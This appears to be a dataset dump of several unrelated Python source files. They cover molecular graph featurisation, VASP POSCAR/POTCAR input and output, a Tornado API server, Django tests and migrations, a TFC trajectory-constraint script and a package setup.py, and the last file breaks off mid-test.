# suppress ho.pisa loggin message
import logging
class PisaNullHandler(logging.Handler):
    """Logging handler that discards every record (silences ho.pisa)."""
    def emit(self, record):
        # Intentionally do nothing: pisa's log output is suppressed.
        pass

logging.getLogger("ho.pisa").addHandler(PisaNullHandler())
if __name__ == "__main__":
    debug = True
    import os, sys
    # Derive the output PDF name from the input markdown file name.
    outfile = os.path.splitext(sys.argv[1])[0] + ".pdf"
    # NOTE(review): the trailing [1:] drops the file's first character —
    # presumably a BOM; confirm the input files actually start with one.
    text = unicode(open(sys.argv[1],'r'),'utf-8')[1:]
    markdown2pdf(text, outfile, fontfile='SeoulHangang.ttf')
# vim:sw=4:ts=4:et
| StarcoderdataPython |
4904041 | <reponame>karaage0703/zero-deeplearning
import numpy as np
import matplotlib.pylab as plt
def sigmoid(x):
    """Return the logistic sigmoid of x (elementwise on ndarray input)."""
    denominator = 1 + np.exp(-x)
    return 1 / denominator
# Plot the sigmoid over [-5, 5) with a small vertical margin.
x = np.arange(-5.0, 5.0 , 0.1)
y = sigmoid(x)
plt.plot(x, y)
plt.ylim(-0.1, 1.1)
plt.show()
| StarcoderdataPython |
11344672 | <reponame>Steap/SIXEcho<gh_stars>0
# coding=utf-8
from unittest import TestCase
from sixecho import Client
import sixecho
from time import sleep
class TestSixecho(TestCase):
    """Tests for the sixecho client library: tokenisation, progress bar,
    minhash digest generation and Jaccard similarity."""

    def test_tokenize(self):
        # Long Thai paragraph; tokenize should report a positive token count.
        word = 'ในการเขียนโปรแกรมในภาษา Python โมดูล (Module) คือไฟล์ของโปรแกรมที่กำหนดตัวแปร ฟังก์ชัน หรือคลาสโดยแบ่งย่อยออกไปจากโปรแกรมหลัก และสามารถนำมาใช้งานได้โดยการนำเข้ามาในโปรแกรม (Import) กล่าวอีกนัยหนึ่ง โมดูลก็คือไลบรารี่ที่สร้างไว้และนำมาใช้งานในโปรแกรม ในบทนี้ เราจะพูดถึงความหมายของโมดูล การสร้าง และการใช้งานโมดูลในการเขียนโปรแกรม นอกจากนี้ เราจะแนะนำให้คุณรู้จักกับ Package ซึ่งเป็นแนวคิดในการจัดการกับโมดูลในรูปแบบของ Namespace'
        words = sixecho.tokenize(str=word)
        self.assertTrue(words>0)

    def test_printProgressBar(self):
        # Drive the progress bar through all 57 steps; only checks it runs.
        items = list(range(0, 57))
        l = len(items)
        sixecho.printProgressBar(0, l, prefix = 'Progress:', suffix = 'Complete', length = 50, fill = '█')
        for i,_ in enumerate(items):
            sleep(0.1)
            sixecho.printProgressBar(i + 1, l, prefix = 'Progress:', suffix = 'Complete', length = 50,fill = '█')
        self.assertTrue(True)

    def test_generate(self):
        # A generated minhash digest always contains 128 hashes.
        client = Client()
        client.generate(str="สวัสดีครับ ผมชื่อ กอล์ฟ")
        self.assertTrue(client.digest().size==128)

    def test_jaccard_different(self):
        # Completely unrelated sentences have zero Jaccard similarity.
        client = Client()
        client.generate(str="สวัสดีครับ ผมชื่อ กอล์ฟ")
        client2 = Client()
        client2.generate(str="วันนี้เป็นที่พฤหัสบดี")
        self.assertEqual(0.0,client.min_hash.jaccard(client2.min_hash))

    def test_jaccard_likely(self):
        # Partially related sentences stay below 0.5 similarity.
        client = Client()
        client.generate(str="สวัสดีครับ ผมชื่อ กอล์ฟ")
        client2 = Client()
        client2.generate(str="ผมชื่อแบงก์ I am bank. ไปเที่ยวกันไหม")
        print(client.min_hash.jaccard(client2.min_hash))
        self.assertTrue(client.min_hash.jaccard(client2.min_hash)< 0.5)
| StarcoderdataPython |
5165050 | <filename>tcvaemolgen/structures/mol_features.py
"""Molecule Feature Description
Unless otherwise noted, all work by:
******************************************************************
Title: PA-Graph-Transformer
Author: <NAME> (<EMAIL>)
Date: May 28, 2019
Code version: 4274301
Availability: https://github.com/benatorc/PA-Graph-Transformer.git
******************************************************************
"""
import itertools
import rdkit.Chem as Chem
import torch as torch
from typing import Any, Dict, List, Set
from tcvaemolgen.utils.chem import get_clique_mol, tree_decomp
# The default valid symbols for atom features ('*' = wildcard/dummy atom,
# 'UNK' = fallback slot for anything not listed)
SYMBOLS: List[str] = [
    'C', 'N', 'O', 'S', 'F', 'Si', 'P', 'Cl', 'Br', 'Mg',
    'Na', 'Ca', 'Fe', 'As', 'Al', 'I', 'B', 'V', 'K', 'Tl',
    'Yb', 'Sb', 'Sn', 'Ag', 'Pd', 'Co', 'Se', 'Ti', 'Zn',
    'H', 'Li', 'Ge', 'Cu', 'Au', 'Ni', 'Cd', 'In', 'Mn',
    'Zr', 'Cr', 'Pt', 'Hg', 'Pb', 'W', 'Ru', 'Nb', 'Re',
    'Te', 'Rh', 'Tc', 'Ba', 'Bi', 'Hf', 'Mo', 'U', 'Sm',
    'Os', 'Ir', 'Ce', 'Gd', 'Ga', 'Cs', '*', 'UNK'
]

# The default valid formal charges for atom features
FORMAL_CHARGES: List[int] = [-2, -1, 0, 1, 2]

# Valid chirality tag codes for atom features
CHIRAL_TAG: List[int] = [0, 1, 2, 3]

# The default valid bond types for bond features
BOND_TYPES: List[Chem.rdchem.BondType] = [
    Chem.rdchem.BondType.SINGLE,
    Chem.rdchem.BondType.DOUBLE,
    Chem.rdchem.BondType.TRIPLE,
    Chem.rdchem.BondType.AROMATIC,
    None,  # Zero, no bond
]

# Numeric bond order -> rdkit bond type (1.5 encodes aromatic)
BT_MAPPING: Dict[int, Chem.rdchem.BondType] = {
    0.: None,
    1.: Chem.rdchem.BondType.SINGLE,
    2.: Chem.rdchem.BondType.DOUBLE,
    3.: Chem.rdchem.BondType.TRIPLE,
    1.5: Chem.rdchem.BondType.AROMATIC,
}
# Inverse mapping: rdkit bond type -> numeric bond order
BT_MAPPING_INV: Dict[Chem.rdchem.BondType, int] = \
    {v: k for k, v in BT_MAPPING.items()}

# Valid bond stereochemistry codes
BT_STEREO: List[int] = [0, 1, 2, 3, 4, 5]
""" Helper Function to convert BondType index to Float (Aromatic)
Returns
-------
[type]
[description]
"""
def bt_index_to_float(bt_index: int):
bond_type = BOND_TYPES[bt_index]
return BT_MAPPING_INV[bond_type]
# Maximum number of neighbors for an atom
MAX_NEIGHBORS: int = 10
DEGREES: List[int] = list(range(MAX_NEIGHBORS))
EXPLICIT_VALENCES: List[int] = [0, 1, 2, 3, 4, 5, 6]
IMPLICIT_VALENCES: List[int] = [0, 1, 2, 3, 4, 5]
"""
N_ATOM_FEATS: int = (len(SYMBOLS) + len(FORMAL_CHARGES) + len(DEGREES) +
len(EXPLICIT_VALENCES) + len(IMPLICIT_VALENCES) +
len(CHIRAL_TAG) + 1)
"""
N_ATOM_FEATS = (len(SYMBOLS) + len(FORMAL_CHARGES) + len(DEGREES) +
len(EXPLICIT_VALENCES) + len(IMPLICIT_VALENCES) + 1)
N_BOND_FEATS: int = len(BOND_TYPES) + 1 + 1
MAX_NEIGHBORS: int = 10
def get_bt_index(bond_type):
    """Return the feature index of *bond_type* within ``BOND_TYPES``.

    Args:
        bond_type: Either a rdchem bond type object (can be None) or a
            float bond order, which is first translated via ``BT_MAPPING``.
    """
    if bond_type in BOND_TYPES:
        return BOND_TYPES.index(bond_type)
    # A numeric bond order was supplied; map it to the rdchem type first.
    assert bond_type in BT_MAPPING
    return BOND_TYPES.index(BT_MAPPING[bond_type])
def onek_unk_encoding(x: Any, domain: Set):
    """One-hot encode *x* over *domain*, falling back to the 'UNK' slot
    when *x* is not a member of *domain*."""
    target = x if x in domain else 'UNK'
    return [int(target == candidate) for candidate in domain]
def get_atom_features(atom):
    """Given an atom object, returns a torch tensor of features.

    Features are the one-hot encoded symbol, formal charge, degree,
    explicit/implicit valence, plus a trailing aromaticity flag.
    """
    # NOTE: a dead `if False:  # atom.is_dummy` branch that emitted a
    # zero-padded symbol-only vector was removed; it could never execute.
    symbol = onek_unk_encoding(atom.GetSymbol(), SYMBOLS)
    fc = onek_unk_encoding(atom.GetFormalCharge(), FORMAL_CHARGES)
    degree = onek_unk_encoding(atom.GetDegree(), DEGREES)
    exp_valence = onek_unk_encoding(atom.GetExplicitValence(), EXPLICIT_VALENCES)
    imp_valence = onek_unk_encoding(atom.GetImplicitValence(), IMPLICIT_VALENCES)
    aro = [atom.GetIsAromatic()]

    feature_array = symbol + fc + degree + exp_valence + imp_valence + aro
    return torch.Tensor(feature_array)
def get_bond_features(bond: Chem.rdchem.Bond, bt_only: bool = False):
    """Given a bond object, returns a torch tensor of features.

    *bond* may be None, in which case the default non-bond features are
    returned.  With ``bt_only=True`` only the bond-type one-hot is kept,
    dropping the conjugation and ring-membership flags.
    """
    if bond is None:
        bond_type = onek_unk_encoding(None, BOND_TYPES)
        conj, ring = [0], [0]
    else:
        bond_type = onek_unk_encoding(bond.GetBondType(), BOND_TYPES)
        conj = [int(bond.GetIsConjugated())]
        ring = [int(bond.IsInRing())]
    feature_array = bond_type if bt_only else bond_type + conj + ring
    return torch.Tensor(feature_array)
def get_bt_feature(bond_type: Chem.rdchem.BondType):
    """Returns a one-hot vector representing the bond_type.

    Numeric bond orders are first translated through ``BT_MAPPING``.
    """
    mapped = BT_MAPPING.get(bond_type, bond_type)
    return onek_unk_encoding(mapped, BOND_TYPES)
def get_path_bond_feature(bond: Chem.rdchem.Bond):
    """Return bond features for *bond*; a zero vector when bond is None."""
    if bond is None:
        return torch.zeros(N_BOND_FEATS)
    bond_type = onek_unk_encoding(bond.GetBondType(), BOND_TYPES)
    conj = [int(bond.GetIsConjugated())]
    ring = [int(bond.IsInRing())]
    return torch.Tensor(bond_type + conj + ring)
def mol2tensors(mol: Chem.Mol, cliques=False):
    """Convert an rdkit molecule into (node features, edge index, edge
    features[, clique dict]) tensors.

    NOTE(review): the ``cliques=True`` branch appears broken as written:
    ``n_edges`` and ``edge_attr`` are used before being assigned,
    ``get_smiles``/``get_mol`` are not imported in this module, and
    ``get_atom_features`` is called with a molecule rather than an atom.
    Confirm before relying on the clique path.
    """
    if mol is None:
        return None, None
    nodes_dict = {}
    root = 0
    if cliques:
        # Junction-tree style decomposition into cliques.
        cliques, edges = tree_decomp(mol)
        n_cliques = len(cliques)
        nodes = torch.zeros((n_cliques,N_ATOM_FEATS))
        for i, clique in enumerate(cliques):
            print(f'Clique {i}')
            cmol = get_clique_mol(mol, clique)
            nodes[i] = torch.Tensor(get_atom_features(cmol))
            csmiles = get_smiles(cmol)
            nodes_dict[i] = dict(
                smiles=csmiles,
                #mol=get_mol(csmiles),
                clique=[])
            # The clique containing atom 0 becomes the tree root.
            if min(clique) == 0:
                root = i
        if root > 0:
            # Swap entry 0 with the root clique so the root sits at index 0.
            for attr in nodes_dict[0]:
                nodes_dict[0][attr], nodes_dict[root][attr] =\
                    nodes_dict[root][attr], nodes_dict[0][attr]
        edge_index = torch.zeros((n_edges * 2,2),
                                 dtype=torch.long)
        for i, (_x, _y) in zip(itertools.count(), edges):
            # Remap indices so the root/0 swap above is reflected in edges.
            x = 0 if _x == root else root if _x == 0 else _x
            y = 0 if _y == root else root if _y == 0 else _y
            edge_index[2*i] = torch.LongTensor([x, y])
            edge_index[2*i+1] = torch.LongTensor([y, x])
            nodes_dict[x]['clique'].append(y)
            nodes_dict[y]['clique'].append(x)
    else:
        # Plain atom/bond graph: one node per atom, two directed edges per bond.
        n_nodes = mol.GetNumAtoms()
        n_edges = mol.GetNumBonds()
        nodes = torch.zeros((n_nodes,N_ATOM_FEATS),
                            dtype=torch.float64)
        for i, rd_atom in enumerate(mol.GetAtoms()):
            nodes[i] = get_atom_features(rd_atom)
        edge_index = torch.zeros((n_edges * 2,2),
                                 dtype=torch.long)
        edge_attr = torch.zeros((n_edges * 2,N_BOND_FEATS),
                                dtype=torch.float64)
        for i, bond in zip(itertools.count(), mol.GetBonds()):
            _x = bond.GetBeginAtom().GetIdx()
            _y = bond.GetEndAtom().GetIdx()
            x = 0 if _x == root else root if _x == 0 else _x
            y = 0 if _y == root else root if _y == 0 else _y
            edge_index[2*i] = torch.LongTensor([x, y])
            edge_index[2*i+1] = torch.LongTensor([y, x])
            edge_attr[2*i] = get_bond_features(bond)
            edge_attr[2*i+1] = edge_attr[2*i].clone()
    if cliques:
        return nodes, edge_index, edge_attr, nodes_dict
    else:
        return nodes, edge_index, edge_attr
| StarcoderdataPython |
1808909 | from polyphony import testbench
from polyphony import pipelined
def nested06(x):
    """Quadruply nested loop kernel exercising polyphony's pipeline
    scheduler; returns a deterministic checksum seeded by *x*."""
    total = x
    for outer in pipelined(range(4)):
        bump = outer
        for a in range(4):
            bump += 1
            for b in range(4):
                total += 2
                for c in range(4):
                    total += 3
        total += bump
    return total
@testbench
def test():
    # Self-checking testbench: the kernel must produce 928 for input 10.
    assert 928 == nested06(10)

# Execute the testbench when the module runs.
test()
| StarcoderdataPython |
304478 | <reponame>quanshengwu/PyChemia
"""
Routines to read and write POSCAR file
"""
import os
import numpy as _np
import pychemia
def read_poscar(path='POSCAR'):
    """
    Load a POSCAR file and return a pychemia structure object

    :param path: (str) Filename of the POSCAR to read, or a directory
                 containing one
    :return: (pychemia.Structure) or None when the path or the species
             cannot be resolved
    """
    # Resolve the POSCAR (and sibling POTCAR) location from a file or dir.
    if os.path.isfile(path):
        poscarfile = path
        if os.path.dirname(path) != '':
            potcarfile = os.path.dirname(path) + os.sep + 'POTCAR'
        else:
            potcarfile = 'POTCAR'
    elif os.path.isdir(path) and os.path.isfile(path + os.sep + 'POSCAR'):
        poscarfile = path + os.sep + 'POSCAR'
        potcarfile = path + os.sep + 'POTCAR'
    else:
        print("POSCAR path not found")
        return

    # Reading the POSCAR file (context manager fixes the leaked handle).
    with open(poscarfile, 'r') as rf:
        comment = rf.readline().strip()
        latconst = float(rf.readline())
        newcell = _np.zeros((3, 3))
        # The three lattice vectors, scaled by the lattice constant.
        newcell[0, :] = latconst * _np.array([float(x) for x in rf.readline().split()])
        newcell[1, :] = latconst * _np.array([float(x) for x in rf.readline().split()])
        newcell[2, :] = latconst * _np.array([float(x) for x in rf.readline().split()])

        line = rf.readline()
        species = None

        # VASP4 places the atom counts right after the cell; VASP5 inserts
        # a line with the chemical symbols first.
        try:
            natom_per_species = _np.array([int(x) for x in line.split()])
        except ValueError:
            species = [x for x in line.split()]
            line = rf.readline()
            natom_per_species = _np.array([int(x) for x in line.split()])

        natom = _np.sum(natom_per_species)

        if species is None:
            # Old format: recover the species from POTCAR or the comment.
            if os.path.isfile(potcarfile):
                species = get_species(potcarfile)
            elif len(comment.split()) == len(natom_per_species):
                species = comment.split()
            else:
                print(""" ERROR: The POSCAR does not contain information about the species present on the structure
 You can set a consistent POTCAR along the POSCAR or
 modify your POSCAR by adding the atomic symbol on the sixth line of the file""")
                return None

        if not species:
            print('No information about species')
            raise ValueError()

        # Expand the per-species counts into one symbol per atom.
        symbols = []
        for i in range(len(natom_per_species)):
            numspe = natom_per_species[i]
            for j in range(numspe):
                symbols.append(species[i])

        mode = rf.readline()
        if mode[0].lower() in ['c', 'k']:
            kmode = 'Cartesian'
        else:
            kmode = 'Direct'

        pos = []
        for i in range(natom):
            pos += [float(x) for x in rf.readline().split()[:3]]
        pos = _np.array(pos).reshape((-1, 3))

    if kmode == 'Cartesian':
        # Fixed: Cartesian coordinates were previously passed as 'reduced',
        # silently misplacing every atom of a Cartesian POSCAR.  Per the
        # POSCAR spec, Cartesian coordinates are scaled by the constant.
        return pychemia.Structure(cell=newcell, symbols=symbols,
                                  positions=latconst * pos, comment=comment)
    else:
        return pychemia.Structure(cell=newcell, symbols=symbols, reduced=pos, comment=comment)
def write_poscar(structure, filepath='POSCAR', newformat=True):
    """
    Takes an structure from pychemia and save the file
    POSCAR for VASP.

    :param structure: (pychemia.Structure) Structure to write POSCAR
    :param filepath: (str) Filename of POSCAR file to create
    :param newformat: (bool) If the new VASP (>=5) format is used, i.e. a
        line with the chemical symbols precedes the atom counts
    """
    ret = ''
    comp = structure.get_composition()
    # Comment line: the species, by convention.
    for i in comp.species:
        ret += ' ' + i
    ret += '\n'
    ret += '1.0\n'
    for i in range(3):
        ret += ' %20.16f %20.16f %20.16f\n' % tuple(structure.cell[i])
    if newformat:
        # VASP5+: explicit species line before the counts.
        for i in comp.species:
            ret += ' ' + i
        ret += '\n'
    # Fixed: the atom-count line is mandatory in BOTH formats; previously
    # it was only written for the new format, producing an invalid POSCAR
    # when newformat=False.
    for i in comp.values:
        ret += ' ' + str(i)
    ret += '\n'
    ret += 'Direct\n'
    for i in range(structure.natom):
        ret += ' %20.16f %20.16f %20.16f\n' % tuple(structure.reduced[i])
    # Context manager fixes the previously leaked file handle.
    with open(filepath, 'w') as wf:
        wf.write(ret)
def get_species(path):
    """Extract the chemical symbols declared in a VASP POTCAR file.

    :param path: (str) Path to a POTCAR file
    :return: (list) chemical symbols, one per pseudopotential entry
    """
    species = []
    # Context manager fixes the previously leaked file handle.
    with open(path, 'r') as rf:
        for line in rf.readlines():
            tokens = line.split()
            if not tokens:
                continue
            # Entries look like "PAW_PBE Fe_pv 06Sep2000" or "PAW Fe ...";
            # the symbol is the part of the second token before '_'.
            if tokens[0] == 'PAW_PBE':
                species.append(tokens[1].split('_')[0])
            elif tokens[0] == 'PAW' and 'radial' not in line:
                species.append(tokens[1].split('_')[0])
    return species
def write_potcar(structure, filepath='POTCAR', pspdir='potpaw_PBE', options=None, pspfiles=None):
    """Concatenate the per-species POTCAR files for *structure* into one file.

    :param structure: (pychemia.Structure) structure whose composition
        decides which pseudopotentials are needed
    :param filepath: (str) destination POTCAR path
    :param pspdir: (str) pseudopotential family under ~/.vasp/PP-VASP/
    :param options: (dict) optional per-species suffix (str) or list of
        candidate suffixes
    :param pspfiles: (list) explicit list of POTCAR paths; skips discovery
    :return: (list) the POTCAR paths that were concatenated
    """
    comp = structure.get_composition()
    ret = ''
    psppath = os.getenv('HOME') + '/.vasp/PP-VASP/' + pspdir
    if not os.path.exists(psppath):
        raise ValueError("The path for VASP Pseudo-potentials does not exists: " + psppath)
    if pspfiles is None:
        pspfiles = []
        for specie in comp.species:
            pspfile = None
            if options is not None and specie in options:
                if isinstance(options[specie], str):
                    pspfile = psppath + os.sep + specie + '_' + options[specie] + '/POTCAR'
                elif isinstance(options[specie], list):
                    # Fixed: iterate the candidate suffixes directly; the
                    # original indexed the list with its own elements
                    # (options[i][j]) and tested os.path.isfile(psppath),
                    # so the loop never selected a valid file.
                    for suffix in options[specie]:
                        pspfile = psppath + os.sep + specie + '_' + suffix + '/POTCAR'
                        if os.path.isfile(pspfile):
                            break
            else:
                # Default search order: bare symbol, then the '_sv' variant.
                for suffix in ['', '_sv']:
                    pspfile = psppath + os.sep + specie + suffix + '/POTCAR'
                    if os.path.isfile(pspfile):
                        break
            # Fixed: pspfile could previously be unbound here.
            if pspfile is None or not os.path.isfile(pspfile):
                raise ValueError("File not found : " + str(pspfile))
            pspfiles.append(pspfile)
    for pspfile in pspfiles:
        with open(pspfile) as rf:
            ret += rf.read()
    with open(filepath, 'w') as wf:
        wf.write(ret)
    return pspfiles
| StarcoderdataPython |
3455021 | from rest_framework import status
from rest_framework.reverse import reverse
from tests.test_service_catalog.base_test_request import BaseTestRequest
from tests.utils import check_data_in_dict
class TestApiTowerServerPut(BaseTestRequest):
    """Permission and validation tests for PUT on the tower-server detail endpoint."""

    def setUp(self):
        super(TestApiTowerServerPut, self).setUp()
        # Complete, valid update payload for an existing tower server.
        self.put_data = {
            'name': "New Tower Server",
            'host': "my-tower-domain.com",
            'token': "<PASSWORD>",
            'secure': True,
            'ssl_verify': False
        }
        self.kwargs = {
            'pk': self.tower_server_test.id
        }
        self.tower_server_url = reverse('api_tower_server_details', kwargs=self.kwargs)

    def _put_tower_server(self):
        # Every test case issues the same PUT; only the client session
        # and/or the payload differ.
        return self.client.put(self.tower_server_url, data=self.put_data,
                               content_type="application/json")

    def test_admin_put_tower_server(self):
        response = self._put_tower_server()
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        check_data_in_dict(self, [self.put_data], [response.data])

    def test_admin_cannot_put_on_tower_server_not_full(self):
        # An incomplete payload (missing 'name') must be rejected.
        self.put_data.pop('name')
        response = self._put_tower_server()
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_customer_cannot_put_tower_server(self):
        self.client.force_login(user=self.standard_user)
        response = self._put_tower_server()
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_cannot_put_tower_server_when_logout(self):
        self.client.logout()
        response = self._put_tower_server()
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
| StarcoderdataPython |
9767614 | #!/usr/bin/env python
from setuptools import setup, find_packages
import re
# get version from init file
# Single-source the package version: parse __version__ out of
# ginjinn/__init__.py instead of importing the package (which could
# pull in heavy dependencies at install time).
with open('ginjinn/__init__.py', 'r') as f:
    VERSION=re.search(
        r"^__version__ = ['\"]([^'\"]*)['\"]",
        f.read(),
        re.M
    ).group(1)

# Short description used in the setup() metadata below.
DESCRIPTION='Object detection pipeline for the extraction of structures from herbarium specimens'
def install_requires():
    '''Get requirements from requirements.txt'''
    # Requirement parsing is deliberately disabled for now; dependencies
    # are expected to be provided by the environment.
    # with open('requirements.txt') as f:
    #     return f.read().splitlines()
    return []
# Package metadata and entry points.  Fixed: stray non-Python residue
# fused onto the closing parenthesis made the file unparseable.
setup(
    name='ginjinn',
    version=VERSION,
    url='https://github.com/AGOberprieler/ginjinn',
    author='<NAME>',
    author_email='<EMAIL>',
    description=DESCRIPTION,
    packages=find_packages(),
    install_requires=install_requires(),
    entry_points={
        'console_scripts': [
            # Exposes the `ginjinn` command, dispatching to the CLI main().
            'ginjinn = ginjinn.__main__:main',
        ]
    },
    package_data={
        # Ship config/templates alongside the code.
        'ginjinn': [
            'data_files/*.yaml',
            'data_files/tf_config_templates/*.config',
            'data_files/tf_script_templates/*',
            'data_files/*',
        ],
    }
)
141451 | <reponame>kubikvid/weather-this-day<filename>backend/main.py
# Copyright (c) 2019. Lorem ipsum dolor sit amet, consectetur adipiscing elit.
# Morbi non lorem porttitor neque feugiat blandit. Ut vitae ipsum eget quam lacinia accumsan.
# Etiam sed turpis ac ipsum condimentum fringilla. Maecenas magna.
# Proin dapibus sapien vel ante. Aliquam erat volutpat. Pellentesque sagittis ligula eget metus.
# Vestibulum commodo. Ut rhoncus gravida arcu.
from typing import Optional, Awaitable
from sys import argv
from tornado.web import RequestHandler, Application
from tornado.ioloop import IOLoop
# from handlers.history import History
import handlers.history
from lib.db_methods import MongoHandler
class BasicHandler(RequestHandler):
    """Base request handler sharing a MongoDB accessor with subclasses."""

    # NOTE(review): class attribute, so a single MongoHandler instance is
    # shared across all requests/handlers — confirm that is intended.
    db_handler = MongoHandler()

    def prepare(self) -> Optional[Awaitable[None]]:
        """Pre-request hook; currently just delegates to the base class."""
        return super().prepare()

    def on_finish(self) -> None:
        """Post-request hook; currently just delegates to the base class."""
        super().on_finish()
def get_app():
    """Build the Tornado application with all API routes registered."""
    routes = [
        (r'/api/history', handlers.history.History),
    ]
    # autoreload is convenient during development; disable in production.
    return Application(routes, autoreload=True)
def run():
    """Start the HTTP server.

    The listen port is taken from the first command-line argument and
    falls back to 8080 when none is given.  Exits the process when the
    argument is not a valid integer or the port cannot be bound.

    Fixed: the server-start code previously lived in the ``else`` clause
    of the argv ``try`` block, so running with no arguments set the
    default port but never started the server.
    """
    if len(argv) < 2:
        port = 8080
    else:
        try:
            port = int(argv[1])
        except ValueError:
            print("Error: please provide a correct port")
            exit(0)
    app = get_app()
    try:
        print(f"Started on localhost:{port}")
        app.listen(port)
        IOLoop.current().start()
    except Exception:
        print(f"Cannot start server with given port")
        exit(0)
# Script entry point: start the server when executed directly.
if __name__ == '__main__':
    run()
| StarcoderdataPython |
3390588 | <reponame>leakec/tfc<gh_stars>10-100
# This script solves Problem #6 of Chapter 1's exercises in the TFC book
####################################################################################################
# Create a constrained expression which begins at (-1,-1) and ends at (1,1).
# The constrained expression should also a void a box whose corners are
# given by (-0.5,-0.5) and (0.5,0.5).
####################################################################################################
from tfc import utfc
from tfc.utils import MakePlot, step
import jax.numpy as np
from matplotlib.patches import Rectangle
import numpy as onp
####################################################################################################
## user defined parameters: ************************************************************************
N = 1000 # number of discretization points per TFC step
m = 10 # number of basis function terms
basis = 'CP' # basis function type
nC = 2 # number of constraints

## problem initial conditions: *********************************************************************
tspan = [0., 1.] # time range of problem

# Endpoint constraints: the trajectory must start at (-1,-1) and end at (1,1).
initial = np.array([-1.0, -1.0])
final = np.array([ 1.0, 1.0])

# Number of random trajectories to draw in the plot.
Nlines = 20

## keep-out parameters: ****************************************************************************
# Corners of the box the trajectories must avoid.
xbound = np.array([-0.5, 0.5])
ybound = np.array([-0.5, 0.5])

## construct univariate tfc class: *****************************************************************
tfc = utfc(N, nC, m, basis = basis, x0=tspan[0], xf=tspan[-1])
t = tfc.x   # discretized time grid
H = tfc.H   # basis-function matrix as a function of t
# Basis evaluated at the endpoints, used to enforce the point constraints.
H0 = H(t[0])
Hf = H(t[-1])
## define tfc constrained expression: **************************************************************
# switching function: linear blends that are 1 at one endpoint and 0 at the other
phi1 = lambda t: (t[-1] - t) / (t[-1] - t[0])
phi2 = lambda t: (t - t[0]) / (t[-1] - t[0])

# tfc constrained expression (without inequality constraints)
# Free function np.dot(H(t), xi) corrected so the endpoints are satisfied exactly.
xhat = lambda xi: np.dot(H(t),xi) + phi1(t)*(initial[0] - np.dot(H0,xi)) \
                                  + phi2(t)*(final[0] - np.dot(Hf,xi))
yhat = lambda xi: np.dot(H(t),xi) + phi1(t)*(initial[1] - np.dot(H0,xi)) \
                                  + phi2(t)*(final[1] - np.dot(Hf,xi))

# construct pseudo-switching functions for the box constraints
# step(.) acts as a Heaviside switch around the box edges/midpoint.
Phi1 = lambda ghat, bound: step(bound[1] - ghat)
Phi2 = lambda ghat, bound: step(ghat - bound[0])
Phi3 = lambda ghat, bound: step((bound[1]+bound[0])/2. - ghat)

# tfc constrained expression (with inequality constraints)
# Whenever (xhat, yhat) falls inside the keep-out box, the point is
# projected to the nearest vertical box edge.
x = lambda x_xi, y_xi: xhat(x_xi) \
        + (xbound[0]-xhat(x_xi))*(Phi1(yhat(y_xi),ybound)*Phi2(yhat(y_xi),ybound) *\
                                  Phi3(xhat(x_xi),xbound)*Phi2(xhat(x_xi),xbound)) \
        + (xbound[1]-xhat(x_xi))*(Phi1(yhat(y_xi),ybound)*Phi2(yhat(y_xi),ybound) *\
                                  Phi3(-xhat(x_xi),-xbound)*Phi1(xhat(x_xi),xbound))
# Same projection for the y coordinate (horizontal box edges).
y = lambda x_xi, y_xi: yhat(y_xi) \
        + (ybound[0]-yhat(y_xi))*(Phi1(xhat(x_xi),xbound)*Phi2(xhat(x_xi),xbound) *\
                                  Phi3(yhat(y_xi),ybound)*Phi2(yhat(y_xi),ybound)) \
        + (ybound[1]-yhat(y_xi))*(Phi1(xhat(x_xi),xbound)*Phi2(xhat(x_xi),xbound) *\
                                  Phi3(-yhat(y_xi),-ybound)*Phi1(yhat(y_xi),ybound))

onp.random.seed(4) # fixes random seed to create the same plot in book
# Random coefficient vectors, one column per plotted trajectory.
x_xi = 0.1 * onp.random.randn(H(t).shape[1], Nlines)
y_xi = 0.1 * onp.random.randn(H(t).shape[1], Nlines)

## plotting: ***************************************************************************************
p1 = MakePlot(r'$x(t)$',r'$y(t)$')
for i in range(Nlines):
    p1.ax[0].plot(x(x_xi[:,i],y_xi[:,i]), y(x_xi[:,i],y_xi[:,i]))

# Draw the keep-out box (white) and the fixed endpoints (black dots).
p1.ax[0].add_patch(Rectangle((xbound[0],ybound[0]), xbound[1]-xbound[0], ybound[1]-ybound[0], fc='white',ec="white"))
p1.ax[0].plot(initial[0], initial[1], 'ko', markersize = 10)
p1.ax[0].plot(final[0], final[1], 'ko', markersize = 10)

p1.PartScreen(7.,6.)
p1.show()
| StarcoderdataPython |
1835243 | <reponame>Cent-Luc/University_Portal<filename>students/migrations/0002_auto_20191126_0241.py
# Generated by Django 2.2.7 on 2019-11-26 02:41
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django; narrows 'level_of_study' on the Student
    # model to a fixed set of choices.

    dependencies = [
        ('students', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='student',
            name='level_of_study',
            field=models.CharField(choices=[('Certificate', 'Certificate'), ('Diploma', 'Diploma'), ('Degree', 'Degree'), ('Master', 'Master')], max_length=15),
        ),
    ]
| StarcoderdataPython |
65548 | from oso import Oso
from .auth import register_models
class SQLAlchemyOso(Oso):
    """The central object to manage application policy state, e.g.
    the policy data, and verify requests when using Oso with SQLAlchemy.

    Supports SQLAlchemy-specific functionality, including data filtering.

    Accepts a SQLAlchemy declarative_base on initialization, which is used to register
    all relevant SQLAlchemy models with Oso.

    >>> from sqlalchemy_oso import SQLAlchemyOso
    >>> from sqlalchemy.ext.declarative import declarative_base
    >>> Base = declarative_base(name="MyBaseModel")
    >>> SQLAlchemyOso(Base)
    <sqlalchemy_oso.oso.SQLAlchemyOso object at 0x...>
    """

    def __init__(self, sqlalchemy_base):
        """:param sqlalchemy_base: SQLAlchemy declarative base whose mapped
        models should be registered with Oso."""
        super().__init__()

        # Register all sqlalchemy models on sqlalchemy_base
        register_models(self, sqlalchemy_base)

        # Keep a reference to the base for later model lookups.
        self.base = sqlalchemy_base
| StarcoderdataPython |
1653231 | <filename>api/tests/test_views.py<gh_stars>10-100
import pytest
from django.core.cache import cache
from django.shortcuts import reverse
from rest_framework.test import APIClient
from core.recipe import recipe_sites
client = APIClient()
@pytest.mark.django_db
def test_no_url_error():
    """POSTing without a 'url' key must yield HTTP 400."""
    resp = client.post(reverse("calculate-from-url"), {}, format="json")
    assert resp.status_code == 400
@pytest.mark.django_db
def test_domain_not_supported():
    """A URL whose domain has no scraper registered is rejected with 400."""
    payload = {"url": "http://notsupportedsite.org"}
